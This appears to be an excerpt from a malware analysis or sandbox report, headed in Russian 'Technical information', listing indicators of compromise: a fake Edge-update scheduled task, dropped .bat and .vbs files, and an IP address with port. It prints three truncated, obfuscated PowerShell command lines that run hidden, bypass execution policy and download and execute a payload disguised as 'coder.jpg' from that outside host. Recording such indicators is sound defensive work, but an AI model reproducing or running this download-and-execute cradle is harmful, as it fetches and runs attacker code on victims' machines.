Техническая информация
- <SYSTEM32>\tasks\microsoftedgeupdate
- C:\users\public\ytdon.bat
- C:\users\public\ytdon.vbs
- '45.##8.16.89':222
- http://45.###.16.89:222/coder.jpg via 45.##8.16.89
- '<SYSTEM32>\cmd.exe' /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://45.138.16.89:222/coder.jpg'')'.RePLACe('VAN','...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://45.138.16.89:222/coder.jpg'')'.RePLACe('VAN','...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://45.138.16.89:222/coder.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]...